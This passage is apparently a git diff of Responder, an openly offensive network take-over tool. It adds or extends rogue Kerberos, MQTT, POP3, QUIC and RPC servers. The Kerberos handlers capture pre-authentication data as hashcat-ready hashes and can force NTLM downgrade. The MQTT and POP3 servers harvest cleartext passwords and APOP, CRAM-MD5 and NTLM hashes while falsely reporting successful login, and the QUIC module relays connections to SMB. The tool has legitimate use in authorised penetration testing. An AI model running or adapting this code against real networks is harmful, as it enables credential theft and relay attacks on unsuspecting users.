else:
# Default CAPTURE mode - send pre-auth required
if settings.Config.Verbose:
print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
# Build KRB-ERROR response
krb_error = build_krb_error(realm, cname)
# Send with Record Mark
response = struct.pack('>I', len(krb_error)) + krb_error
self.request.sendall(response)
if settings.Config.Verbose:
print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
elif msg_type == 12: # TGS-REQ
if settings.Config.Verbose:
print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
except Exception as e:
if settings.Config.Verbose:
print(text('[KERB] Error: %s' % str(e)))
class KerbUDP(BaseRequestHandler):
"""Kerberos UDP handler (port 88)"""
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except:
pass
data, socket_obj = self.request
# Parse Kerberos message
msg_type, valid, cname, realm = find_msg_type(data)
if not valid:
if settings.Config.Verbose:
print(text('[KERB] Invalid Kerberos message'))
return
if msg_type == 10: # AS-REQ
# Check operation mode
kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
# Check if client sent PA-DATA
has_padata, etype = find_padata_and_etype(data)
if has_padata and etype:
# Client sent pre-auth data - extract the encrypted timestamp
etype_num, cipher_hex = extract_encrypted_timestamp(data)
if etype_num and cipher_hex:
etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
if settings.Config.Verbose:
print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
# Build the hash in hashcat format
if etype_num == 0x17 or etype_num == 0x18: # RC4 (23 = 0x17, 24 = 0x18)
if len(cipher_hex) >= 32:
first_16_bytes = cipher_hex[0:32]
rest = cipher_hex[32:]
flipped_hash = rest + first_16_bytes
hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
else:
hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
elif etype_num == 0x12: # AES256 (18) - hashcat mode 19900
# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
elif etype_num == 0x11: # AES128 (17) - hashcat mode 19800
# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
else:
hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
# Log to database
SaveToDb({
'module': 'Kerberos',
'type': 'AS-REQ',
'client': self.client_address[0],
'user': cname,
'domain': realm,
'hash': hash_value,
'fullhash': hash_value
})
# Print the hash
if etype_num == 0x17 or etype_num == 0x18:
print(color('[KERB] Kerberos Pre-Auth (hashcat -m 7500): %s' % hash_value, 3, 1))
elif etype_num == 0x12:
print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19900): %s' % hash_value, 3, 1))
elif etype_num == 0x11:
print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19800): %s' % hash_value, 3, 1))
else:
print(color('[KERB] Kerberos 5 AS-REQ (etype %d): %s' % (etype_num, hash_value), 3, 1))
else:
if settings.Config.Verbose:
print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
else:
# First AS-REQ without pre-auth
if kerberos_mode == 'FORCE_NTLM':
# Force NTLM fallback mode
if settings.Config.Verbose:
print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
# Build KRB-ERROR with ETYPE_NOSUPP
krb_error = build_krb_error_force_ntlm(realm, cname)
# Send directly (no Record Mark for UDP)
socket_obj.sendto(krb_error, self.client_address)
if settings.Config.Verbose:
print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
# Log to database
SaveToDb({
'module': 'Kerberos',
'type': 'NTLM-Fallback-Forced',
'client': self.client_address[0],
'user': cname,
'domain': realm,
'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
})
else:
# Default CAPTURE mode - send pre-auth required
if settings.Config.Verbose:
print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
# Build KRB-ERROR response
krb_error = build_krb_error(realm, cname)
# Send directly (no Record Mark for UDP)
socket_obj.sendto(krb_error, self.client_address)
if settings.Config.Verbose:
print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
elif msg_type == 12: # TGS-REQ
if settings.Config.Verbose:
print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
except Exception as e:
if settings.Config.Verbose:
print(text('[KERB] Error: %s' % str(e)))

1014
servers/LDAP.py
View File

File diff suppressed because it is too large Load Diff

205
servers/MQTT.py Normal file
View File

@@ -0,0 +1,205 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import settings, NetworkSendBufferPython2or3, SaveToDb
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket
#Read N byte integer
def readInt(data, offset, numberOfBytes):
value = int.from_bytes(data[offset:offset+numberOfBytes], 'big')
offset += numberOfBytes
return (value, offset)
#Read binary data
def readBinaryData(data, offset):
#Read number of bytes
length, offset = readInt(data, offset, 2)
#Read bytes
value = data[offset:offset+length]
offset += length
return (value, offset)
#Same as readBinaryData() but without reading data
def skipBinaryDataString(data, offset):
length, offset = readInt(data, offset, 2)
offset += length
return offset
#Read UTF-8 encoded string
def readString(data, offset):
value, offset = readBinaryData(data, offset)
return (value.decode('utf-8'), offset)
#Read variable byte integer
#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011)
def readVariableByteInteger(data, offset):
multiplier = 1
value = 0
while True:
encodedByte = data[offset]
offset += 1
value = (encodedByte & 127) * multiplier
if (multiplier > 128 * 128 * 128):
return None
multiplier *= 128
if(encodedByte & 128 == 0):
break
return (value, offset)
class MqttPacket:
USERNAME_FLAG = 0x80
PASSWORD_FLAG = 0x40
WILL_FLAG = 0x04
def __init__(self, data):
self.__isValid = True
controllPacketType, offset = readInt(data, 0, 1)
#check if CONNECT packet type
if controllPacketType != 0x10:
self.__isValid = False
return
#Remaining length
remainingLength, offset = readVariableByteInteger(data, offset)
#Protocol name
protocolName, offset = readString(data, offset)
#Check protocol name
if protocolName != "MQTT" and protocolName != "MQIsdp":
self.__isValid = False
return
#Check protocol version
self.__protocolVersion, offset = readInt(data, offset, 1)
#Read connect flag register
connectFlags, offset = readInt(data, offset, 1)
#Read keep alive (skip)
offset += 2
#MQTTv5 implements properties
if self.__protocolVersion > 4:
#Skip all properties
propertiesLength, offset = readVariableByteInteger(data, offset)
offset+=propertiesLength
#Get Client ID
self.clientId, offset = readString(data, offset)
if (self.clientId == ""):
self.clientId = "<Empty>"
#Skip Will
if (connectFlags & self.WILL_FLAG) > 0:
#MQTT v5 implements properties
if self.__protocolVersion > 4:
willProperties, offset = readVariableByteInteger(data, offset)
#Skip will properties
offset = skipBinaryDataString(data, offset)
offset = skipBinaryDataString(data, offset)
#Get Username
if (connectFlags & self.USERNAME_FLAG) > 0:
self.username, offset = readString(data, offset)
else:
self.username = "<Empty>"
#Get Password
if (connectFlags & self.PASSWORD_FLAG) > 0:
self.password, offset = readString(data, offset)
else:
self.password = "<Empty>"
def isValid(self):
return self.__isValid
def getProtocolVersion(self):
return self.__protocolVersion
def data(self, client):
return {
'module': 'MQTT',
'type': 'Cleartext',
'client': client,
'hostname': self.clientId,
'user': self.username,
'cleartext': self.password,
'fullhash': self.username + ':' + self.password
}
class MQTT(BaseRequestHandler):
def handle(self):
CONTROL_PACKET_TYPE_CONNECT = 0x10
try:
data = self.request.recv(2048)
#Read control packet type
controlPacketType, offset = readInt(data, 0, 1)
#Skip non CONNECT packets
if controlPacketType != CONTROL_PACKET_TYPE_CONNECT:
return
#Parse connect packet
packet = MqttPacket(data)
#Skip if it contains invalid data
if not packet.isValid():
#Return response
return
#Send response packet
if packet.getProtocolVersion() < 5:
responsePacket = MQTTv3v4ResponsePacket()
else:
responsePacket = MQTTv5ResponsePacket()
self.request.send(NetworkSendBufferPython2or3(responsePacket))
#Save to DB
SaveToDb(packet.data(self.client_address[0]))
except Exception:
self.request.close()
pass

6
servers/MSSQL.py Executable file → Normal file
View File

@@ -168,9 +168,9 @@ class MSSQLBrowser(BaseRequestHandler):
if data:
if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
self.send_response(soc, "MSSQLSERVER")
elif data[0] == b'\x04': # CLNT_UCAST_INST
self.send_response(soc, data[1:].rstrip("\x00"))
elif data[0] == b'\x0F': # CLNT_UCAST_DAC
elif data[0:1] == b'\x04': # CLNT_UCAST_INST
self.send_response(soc, data[1:].rstrip(b"\x00"))
elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC
self.send_dac_response(soc)
def send_response(self, soc, inst):

448
servers/POP3.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -15,42 +15,440 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
import base64
import hashlib
import codecs
import struct
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from packets import POPOKPacket,POPNotOKPacket
from packets import POPOKPacket, POPNotOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
"""POP3 server with multiple authentication methods"""
def __init__(self, *args, **kwargs):
self.challenge = None
self.username = None
BaseRequestHandler.__init__(self, *args, **kwargs)
def generate_challenge(self):
"""Generate challenge for APOP and CRAM-MD5"""
import time
import random
timestamp = int(time.time())
random_data = random.randint(1000, 9999)
# APOP format: <process-id.clock@hostname>
self.challenge = "<%d.%d@%s>" % (random_data, timestamp, settings.Config.MachineName)
return self.challenge
def send_packet(self, packet):
"""Send a packet to client"""
self.request.send(NetworkSendBufferPython2or3(packet))
def send_ok(self, message=""):
"""Send +OK response"""
if message:
response = "+OK %s\r\n" % message
else:
response = "+OK\r\n"
self.request.send(response.encode('latin-1'))
def send_err(self, message=""):
"""Send -ERR response"""
if message:
response = "-ERR %s\r\n" % message
else:
response = "-ERR\r\n"
self.request.send(response.encode('latin-1'))
def send_continue(self, data=""):
"""Send continuation (+) response for multi-line auth"""
if data:
response = "+ %s\r\n" % data
else:
response = "+\r\n"
self.request.send(response.encode('latin-1'))
def handle_apop(self, data):
"""Handle APOP authentication (MD5 challenge-response)"""
# APOP username digest
# digest is MD5(challenge + password)
try:
parts = data.strip().split(b' ', 2)
if len(parts) < 3:
return False
username = parts[1].decode('latin-1')
digest = parts[2].decode('latin-1').lower()
# Format for hashcat/john: username:$apop$challenge$digest
hash_string = "%s:$apop$%s$%s" % (username, self.challenge, digest)
SaveToDb({
'module': 'POP3',
'type': 'APOP',
'client': self.client_address[0],
'user': username,
'hash': digest,
'fullhash': hash_string,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured APOP digest from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 3, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Error parsing APOP: %s' % str(e)))
return False
def handle_auth_plain(self, data):
"""Handle AUTH PLAIN (base64 encoded username/password)"""
try:
# AUTH PLAIN can be sent as:
# AUTH PLAIN <base64>
# or
# AUTH PLAIN
# <base64>
if len(data.strip().split(b' ')) > 2:
# Inline format
auth_data = data.strip().split(b' ', 2)[2]
else:
# Need to read next line
self.send_continue()
auth_data = self.request.recv(1024).strip()
# Decode base64
decoded = base64.b64decode(auth_data)
# Format: [authzid]\x00username\x00password
parts = decoded.split(b'\x00')
if len(parts) >= 3:
username = parts[1].decode('latin-1', errors='ignore')
password = parts[2].decode('latin-1', errors='ignore')
elif len(parts) == 2:
username = parts[0].decode('latin-1', errors='ignore')
password = parts[1].decode('latin-1', errors='ignore')
else:
return False
SaveToDb({
'module': 'POP3',
'type': 'AUTH-PLAIN',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured AUTH PLAIN credentials from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 2, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Error parsing AUTH PLAIN: %s' % str(e)))
return False
def handle_auth_login(self, data):
"""Handle AUTH LOGIN (two-stage base64 authentication)"""
try:
# AUTH LOGIN is two-stage:
# Client: AUTH LOGIN
# Server: + VXNlcm5hbWU6 (base64 "Username:")
# Client: <base64 username>
# Server: + UGFzc3dvcmQ6 (base64 "Password:")
# Client: <base64 password>
# Send "Username:" prompt
self.send_continue(base64.b64encode(b"Username:").decode('latin-1'))
username_b64 = self.request.recv(1024).strip()
if not username_b64:
return False
username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
# Send "Password:" prompt
self.send_continue(base64.b64encode(b"Password:").decode('latin-1'))
password_b64 = self.request.recv(1024).strip()
if not password_b64:
return False
password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
SaveToDb({
'module': 'POP3',
'type': 'AUTH-LOGIN',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured AUTH LOGIN credentials from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 2, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Error parsing AUTH LOGIN: %s' % str(e)))
return False
def handle_auth_cram_md5(self, data):
"""Handle AUTH CRAM-MD5 (challenge-response)"""
try:
# Generate challenge
import time
challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1')
# Send challenge
self.send_continue(challenge_b64)
# Receive response
response_b64 = self.request.recv(1024).strip()
if not response_b64:
return False
response = base64.b64decode(response_b64).decode('latin-1', errors='ignore')
# Response format: username<space>digest
parts = response.split(' ', 1)
if len(parts) < 2:
return False
username = parts[0]
digest = parts[1].lower()
# Format for hashcat: $cram_md5$challenge$digest$username
hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
SaveToDb({
'module': 'POP3',
'type': 'CRAM-MD5',
'client': self.client_address[0],
'user': username,
'hash': digest,
'fullhash': hash_string,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured CRAM-MD5 hash from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), username), 3, 1))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Error parsing CRAM-MD5: %s' % str(e)))
return False
def handle_ntlm_auth(self, data):
"""Handle NTLM authentication"""
try:
# Check for NTLMSSP NEGOTIATE
if b'NTLMSSP\x00\x01' in data:
# Generate NTLM challenge
challenge = RandomChallenge()
# Build NTLMSSP CHALLENGE
ntlm_challenge = b'NTLMSSP\x00'
ntlm_challenge += struct.pack('<I', 2) # Type 2
ntlm_challenge += struct.pack('<HHI', 0, 0, 0) # Target name
ntlm_challenge += struct.pack('<I', 0x00008201) # Flags
ntlm_challenge += challenge # Server challenge
ntlm_challenge += b'\x00' * 8 # Reserved
ntlm_challenge += struct.pack('<HHI', 0, 0, 0) # Target info
# Send challenge (base64 encoded in continuation)
challenge_b64 = base64.b64encode(ntlm_challenge).decode('latin-1')
self.send_continue(challenge_b64)
# Receive NTLMSSP AUTH
auth_b64 = self.request.recv(2048).strip()
if not auth_b64 or auth_b64 == b'*':
return False
auth_data = base64.b64decode(auth_b64)
# Parse NTLMSSP AUTH
if auth_data[0:8] != b'NTLMSSP\x00':
return False
msg_type = struct.unpack('<I', auth_data[8:12])[0]
if msg_type != 3:
return False
# Parse fields
lm_len = struct.unpack('<H', auth_data[12:14])[0]
lm_offset = struct.unpack('<I', auth_data[16:20])[0]
ntlm_len = struct.unpack('<H', auth_data[20:22])[0]
ntlm_offset = struct.unpack('<I', auth_data[24:28])[0]
domain_len = struct.unpack('<H', auth_data[28:30])[0]
domain_offset = struct.unpack('<I', auth_data[32:36])[0]
user_len = struct.unpack('<H', auth_data[36:38])[0]
user_offset = struct.unpack('<I', auth_data[40:44])[0]
# Extract data
username = auth_data[user_offset:user_offset+user_len].decode('utf-16-le', errors='ignore')
domain = auth_data[domain_offset:domain_offset+domain_len].decode('utf-16-le', errors='ignore')
lm_hash = auth_data[lm_offset:lm_offset+lm_len]
ntlm_hash = auth_data[ntlm_offset:ntlm_offset+ntlm_len]
# Determine version
if ntlm_len == 24:
hash_type = "NTLMv1"
hash_string = "%s::%s:%s:%s:%s" % (
username, domain,
codecs.encode(lm_hash, 'hex').decode('latin-1'),
codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
codecs.encode(challenge, 'hex').decode('latin-1')
)
elif ntlm_len > 24:
hash_type = "NTLMv2"
hash_string = "%s::%s:%s:%s:%s" % (
username, domain,
codecs.encode(challenge, 'hex').decode('latin-1'),
codecs.encode(ntlm_hash[:16], 'hex').decode('latin-1'),
codecs.encode(ntlm_hash[16:], 'hex').decode('latin-1')
)
else:
return False
SaveToDb({
'module': 'POP3',
'type': hash_type + '-SSP',
'client': self.client_address[0],
'user': domain + '\\' + username,
'hash': codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
'fullhash': hash_string,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured %s hash from %s for user %s\\%s" % (
hash_type, self.client_address[0].replace("::ffff:", ""), domain, username), 3, 1))
return True
return False
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Error parsing NTLM: %s' % str(e)))
return False
def SendPacketAndRead(self):
"""Send OK packet and read response"""
Packet = POPOKPacket()
self.request.send(NetworkSendBufferPython2or3(Packet))
return self.request.recv(1024)
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == b'CAPA':
self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
# Generate challenge for APOP
challenge = self.generate_challenge()
# Send banner with challenge for APOP support
banner = "+OK POP3 server ready %s\r\n" % challenge
self.request.send(banner.encode('latin-1'))
# Read first command
data = self.request.recv(1024)
# Handle CAPA (capability) command
if data[0:4].upper() == b'CAPA':
# Advertise supported auth methods
capabilities = [
"+OK Capability list follows",
"USER",
"SASL PLAIN LOGIN CRAM-MD5 NTLM",
"IMPLEMENTATION Responder POP3",
"."
]
self.request.send("\r\n".join(capabilities).encode('latin-1') + b"\r\n")
data = self.request.recv(1024)
if data[0:4] == b'AUTH':
self.request.send(NetworkSendBufferPython2or3(POPNotOKPacket()))
# Handle AUTH command
if data[0:4].upper() == b'AUTH':
mechanism = data[5:].strip().upper()
if mechanism == b'PLAIN':
self.handle_auth_plain(data)
self.send_ok("Authentication successful")
return
elif mechanism == b'LOGIN':
self.handle_auth_login(data)
self.send_ok("Authentication successful")
return
elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
self.handle_auth_cram_md5(data)
self.send_ok("Authentication successful")
return
elif mechanism == b'NTLM':
if self.handle_ntlm_auth(data):
self.send_ok("Authentication successful")
else:
self.send_err("Authentication failed")
return
elif not mechanism:
# AUTH without mechanism - list supported
auth_list = "+OK Supported mechanisms:\r\nPLAIN\r\nLOGIN\r\nCRAM-MD5\r\nNTLM\r\n.\r\n"
self.request.send(auth_list.encode('latin-1'))
data = self.request.recv(1024)
else:
self.send_err("Unsupported authentication method")
return
# Handle APOP command
if data[0:4].upper() == b'APOP':
if self.handle_apop(data):
self.send_ok("Authentication successful")
else:
self.send_err("Authentication failed")
return
# Handle traditional USER/PASS
if data[0:4].upper() == b'USER':
User = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
self.send_ok("Password required")
data = self.request.recv(1024)
if data[0:4] == b'USER':
User = data[5:].strip(b"\r\n").decode("latin-1")
data = self.SendPacketAndRead()
if data[0:4] == b'PASS':
Pass = data[5:].strip(b"\r\n").decode("latin-1")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
self.SendPacketAndRead()
except Exception:
if data[0:4].upper() == b'PASS':
Pass = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User + ":" + Pass,
})
if settings.Config.Verbose:
print(color("[*] [POP3] Captured cleartext credentials from %s for user %s" % (
self.client_address[0].replace("::ffff:", ""), User), 2, 1))
self.send_ok("Authentication successful")
return
self.send_err("Unknown command")
except Exception as e:
if settings.Config.Verbose:
print(text('[POP3] Exception: %s' % str(e)))
pass

168
servers/QUIC.py Normal file
View File

@@ -0,0 +1,168 @@
import asyncio
import logging
import ssl
import argparse
import netifaces
from utils import *
from aioquic.asyncio import serve
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.events import QuicEvent, StreamDataReceived, StreamReset, ConnectionTerminated
BUFFER_SIZE = 11000
def get_interface_ip(interface_name):
"""Get the IP address of a network interface."""
try:
# Get address info for the specified interface
addresses = netifaces.ifaddresses(interface_name)
# Get IPv4 address (AF_INET = IPv4)
if netifaces.AF_INET in addresses:
return addresses[netifaces.AF_INET][0]['addr']
# If no IPv4 address, try IPv6 (AF_INET6 = IPv6)
if netifaces.AF_INET6 in addresses:
return addresses[netifaces.AF_INET6][0]['addr']
logging.error(f"[!] No IP address found for interface {interface_name}")
return None
except ValueError:
logging.error(f"[!] Interface {interface_name} not found")
return None
class QUIC(QuicConnectionProtocol):
def __init__(self, *args, target_address=None, **kwargs):
super().__init__(*args, **kwargs)
self.tcp_connections = {} # stream_id -> (reader, writer)
self.target_address = target_address or "localhost"
def quic_event_received(self, event):
if isinstance(event, StreamDataReceived):
asyncio.create_task(self.handle_stream_data(event.stream_id, event.data))
elif isinstance(event, StreamReset) or isinstance(event, ConnectionTerminated):
# Only try to close connections if we have any
if self.tcp_connections:
asyncio.create_task(self.close_all_tcp_connections())
async def handle_stream_data(self, stream_id, data):
if stream_id not in self.tcp_connections:
# Create a new TCP connection to the target interface:445
try:
reader, writer = await asyncio.open_connection(self.target_address, 445)
self.tcp_connections[stream_id] = (reader, writer)
# Start task to read from TCP and write to QUIC
asyncio.create_task(self.tcp_to_quic(stream_id, reader))
logging.info(f"[*] Connected to {self.target_address}:445\n[*] Starting relaying process...")
print(text("[QUIC] Forwarding QUIC connection to SMB server"))
except Exception as e:
logging.error(f"[!] Error connecting to {self.target_address}:445: {e}")
return
# Forward data from QUIC to TCP
try:
_, writer = self.tcp_connections[stream_id]
writer.write(data)
await writer.drain()
except Exception as e:
logging.error(f"[!] Error writing to TCP: {e}")
await self.close_tcp_connection(stream_id)
async def tcp_to_quic(self, stream_id, reader):
try:
while True:
data = await reader.read(BUFFER_SIZE)
if not data:
break
self._quic.send_stream_data(stream_id, data)
self.transmit()
except Exception as e:
logging.error(f"[!] Error reading from TCP: {e}")
finally:
await self.close_tcp_connection(stream_id)
async def close_tcp_connection(self, stream_id):
if stream_id in self.tcp_connections:
_, writer = self.tcp_connections[stream_id]
writer.close()
await writer.wait_closed()
del self.tcp_connections[stream_id]
async def close_all_tcp_connections(self):
try:
# Make a copy of the keys to avoid modification during iteration
stream_ids = list(self.tcp_connections.keys())
for stream_id in stream_ids:
try:
await self.close_tcp_connection(stream_id)
except KeyError:
# Silently ignore if the stream ID no longer exists
pass
except Exception as e:
# Catch any other exceptions that might occur
logging.debug(f"[!] Error closing TCP connections: {e}")
async def start_quic_server(listen_interface, cert_path, key_path):
# Configure QUIC
configuration = QuicConfiguration(
alpn_protocols=["smb"],
is_client=False,
)
# Load certificate and private key
try:
configuration.load_cert_chain(cert_path, key_path)
except Exception as e:
logging.error(f"[!] Could not load {cert_path} and {key_path}: {e}")
return
# Resolve interfaces to IP addresses
listen_ip = listen_interface
if not is_ip_address(listen_interface):
listen_ip = get_interface_ip(listen_interface)
if not listen_ip:
logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
return
target_ip = listen_interface
if not is_ip_address(listen_interface):
target_ip = get_interface_ip(listen_interface)
if not target_ip:
logging.error(f"[!] Could not resolve IP address for interface {listen_interface}")
return
# Start QUIC server with correct protocol factory
server = await serve(
host=listen_ip,
port=443,
configuration=configuration,
create_protocol=lambda *args, **kwargs: QUIC(
*args,
target_address=target_ip,
**kwargs
)
)
logging.info(f"[*] Started listening on {listen_ip}:443 (UDP)")
logging.info(f"[*] Forwarding connections to {target_ip}:445 (TCP)")
# Keep the server running forever
await asyncio.Future()
def is_ip_address(address):
"""Check if a string is a valid IP address."""
import socket
try:
socket.inet_pton(socket.AF_INET, address)
return True
except socket.error:
try:
socket.inet_pton(socket.AF_INET6, address)
return True
except socket.error:
return False

439
servers/RPC.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -27,188 +27,375 @@ else:
from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2
Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1
# Transfer syntaxes
NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" # NDR v2
Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" # v1
MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
#for mapper
DSRUAPI = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2" #v4
LSARPC = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0
NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1
WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1
# Common RPC interface UUIDs (original ones)
DSRUAPI = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2" # v4
LSARPC = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" # v0
NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" # v1
WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" # v1
# Additional RPC interfaces for better coverage
SAMR = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xac" # v1 - Security Account Manager
SRVSVC = "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88" # v3 - Server Service
WKSSVC = "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a" # v1 - Workstation Service
WINREG = "\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03" # v1 - Windows Registry
SVCCTL = "\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03" # v2 - Service Control Manager
ATSVC = "\x82\x06\xf7\x1f\x51\x0a\xe8\x30\x07\x6d\x74\x0b\xe8\xce\xe9\x8b" # v1 - Task Scheduler
DNSSERVER= "\xa4\xc2\xab\x50\x4d\x57\xb3\x40\x9d\x66\xee\x4f\xd5\xfb\xa0\x76" # v5 - DNS Server
def Chose3264x(packet):
if Map32 in packet:
return Map32
else:
return Map64
# Interface names for logging
INTERFACE_NAMES = {
DSRUAPI: "DRSUAPI",
LSARPC: "LSARPC",
NETLOGON: "NETLOGON",
WINSPOOL: "WINSPOOL",
SAMR: "SAMR",
SRVSVC: "SRVSVC",
WKSSVC: "WKSSVC",
WINREG: "WINREG",
SVCCTL: "SVCCTL",
ATSVC: "ATSVC",
